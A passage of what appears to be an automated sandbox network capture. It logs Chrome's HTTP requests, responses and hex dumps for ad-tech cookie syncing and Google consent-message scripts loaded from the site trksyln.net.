                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: checkForPermission=ok
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC846INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      location: https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFENkJVN09SNVFBQUJXb1Z0Yi1odw&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1
                                                                                                                                                                                                                                                                                                                      Server: gunicorn
                                                                                                                                                                                                                                                                                                                      set-cookie: bito=AAD6BU7OR5QAABWoVtb-hw; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      set-cookie: bitoIsSecure=ok; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      set-cookie: checkForPermission=""; Domain=bidr.io; expires=Thu, 01 May 2008 00:00:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: Close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      67192.168.2.44992335.71.131.1374437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC862OUTGET /track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; TDCPM=CAEYBSgCMgsI-O_s4-n4vD0QBTgB
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC643INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                      location: https://cm.g.doubleclick.net/pixel?google_nid=TheTradeDesk&google_hm=ZDFiODE3ZTUtNTZjNS00NWY0LTg2NGUtNjM0ZDY0MzE5NzVi&google_push&gdpr=0&gdpr_consent=&ttd_tdid=d1b817e5-56c5-45f4-864e-634d6431975b
                                                                                                                                                                                                                                                                                                                      set-cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; expires=Fri, 31 Oct 2025 18:19:36 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                      set-cookie: TDCPM=CAESFQoGZ29vZ2xlEgsIpMeLwNP4vD0QBRgFIAEoAjILCPjv7OPp-Lw9EAU4AQ..; expires=Fri, 31 Oct 2025 18:19:36 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC423INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 54 68 65 54 72 61 64 65 44 65 73 6b 26 67 6f 6f 67 6c 65 5f 68 6d 3d 5a 44 46 69 4f 44 45 33 5a 54 55 74 4e 54 5a 6a 4e 53 30 30 4e 57 59 30 4c 54 67 32 4e 47 55 74 4e 6a 4d 30 5a 44 59 30 4d 7a 45 35 4e 7a 56 69 26 67 6f 6f 67 6c 65 5f 70 75 73 68 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 74 74 64 5f 74 64 69 64 3d 64 31 62 38 31 37 65 35 2d 35 36 63 35 2d 34 35 66 34 2d 38 36 34 65 2d 36 33 34 64 36 34 33 31 39 37 35 62 22 3e 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78
                                                                                                                                                                                                                                                                                                                      Data Ascii: Redirecting to: <a href="https://cm.g.doubleclick.net/pixel?google_nid=TheTradeDesk&google_hm=ZDFiODE3ZTUtNTZjNS00NWY0LTg2NGUtNjM0ZDY0MzE5NzVi&google_push&gdpr=0&gdpr_consent=&ttd_tdid=d1b817e5-56c5-45f4-864e-634d6431975b">https://cm.g.doubleclick.net/pix


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      68192.168.2.44992474.119.117.164437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC914OUTGET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: widget.us.criteo.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      content-type: image/gif
                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                                                                                                                                                                      expires: Thu, 31 Oct 2024 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                      x-errorlevel: 0
                                                                                                                                                                                                                                                                                                                      p3p: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                      server-processing-duration-in-ticks: 267563
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; preload;
                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC49INData Raw: 32 42 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 2BGIF89a!,D;
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      69192.168.2.44992554.170.20.2054437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:36 UTC818OUTGET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.prod.bidr.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: checkForPermission=ok
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC850INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:36 GMT
                                                                                                                                                                                                                                                                                                                      location: https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFDOUVFN09SNVFBQUJRUkRLV1VFdw&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1
                                                                                                                                                                                                                                                                                                                      Server: gunicorn
                                                                                                                                                                                                                                                                                                                      set-cookie: bito=AAC9EE7OR5QAABQRDKWUEw; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      set-cookie: bitoIsSecure=ok; Domain=bidr.io; expires=Sun, 30 Nov 2025 14:19:36 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      set-cookie: checkForPermission=""; Domain=bidr.io; expires=Thu, 01 May 2008 00:00:00 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: Close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      70192.168.2.449937142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC1145OUTGET /f/AGSKWxUB99RlJ_8i7LLI3oNTdMLmCw2CQVqckIxJK9gf-02-WMpmqGqaY-w86Dc5gRTrOlzGhRgGU2qqZ_W1MTy0YY21viTL3rQc18HIx6JgnCbhVFUEjsqMaMITOmSLmaXPdGl8WFcYzw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4Nzc1LDY4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNSw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMTgsIltbWzFdXV0iXSxbMiwiW251bGwsW251bGwsMSxbMTczMDM5ODc3NCwyNjUzNTkwMDBdXV0iXV1d HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC1942INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:37 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9MC55qp2rULSZnyO8eSN_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytHikmLw0ZBiWMS_i0ni60smLSB2Sp_BGgLErTfPsU4H4qR_51lLgNhd6yKrPxAbKlxidQZix6JLrJ5ArNpzidUciO-vu8T6HIiLJK6wtgDx7aYrrI-BmOHrFVYOIBbi4dg5pX8nm8CL1nfzGJU0kvIL45Pz80qKMpNKS_KL0pLTUotTi8pSi-KNDIxMDA2MDfQMDOILDABpgUFY"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC1942INData Raw: 64 33 62 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 4e 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 4e 6f 2c 5f 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: d3bif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var No=function(a){this.l=_.t(a)};_.v(No,_.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC1452INData Raw: 35 75 69 37 65 61 55 49 33 39 6b 6a 55 76 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 6e 75 6c 6c 2c 5c 78 35 62 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 58 77 37 4a 77 55 42 34 70 37 68 42 48 32 42 4c 5f 72 75 6f 36 78 78 6d 53 76 45 6c 2d 31 5a 6d 38 42 76 30 31 33 78 50 68 74 76 72 66 4c 32 57 38 2d 5f 55 30 72 6d 57 4b 69 30 36 65 6a 31 50 38 36 59 7a 43 44 76 39 61 77 63 32 5f 64 64 48 54 2d 53 4a 50 6e 5a 48 63 4e 67 33 31 50 6b 6e 4d 72 4b 5a 6d 52 58 58 38 65 65 43 36 46 47 79 54 7a 42 33 2d 7a 75 52 2d 70 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: 5ui7eaUI39kjUvQ\\\\u003d\\\\u003d\\\x22\x5d,null,\x5b\x5bnull,null,null,\\\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxXw7JwUB4p7hBH2BL_ruo6xxmSvEl-1Zm8Bv013xPhtvrfL2W8-_U0rmWKi06ej1P86YzCDv9awc2_ddHT-SJPnZHcNg31PknMrKZmRXX8eeC6FGyTzB3-zuR-pu
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      71192.168.2.449955142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:38 UTC845OUTPOST /el/AGSKWxWjHabnSuL9B4VxegZWyCa9ZWTSIsOp_ZY9ZoJkDPE9Ujj3y2AZV0SUbX7NBP62pLon8MtTt3yiG7oPyyfx_mdT0EtP7qmFOrtM3pz2NbBkYKcNRaLSg5Ln_f5cPEZs9JBBIQd-Cg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:38 UTC150OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 36 39 37 35 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 32 37 36 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 22 74 72 6b 73 79 6c 6e 2e 6e 65 74 22 2c 33 5d 5d 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398776975,null,null,null,null,null,null,null,null,null,null,null,[[1,276,"trksyln.net","trksyln.net",3]]]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:38 UTC1862INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:38 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-KvaqgPzydx4aZ3EDLyGZWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
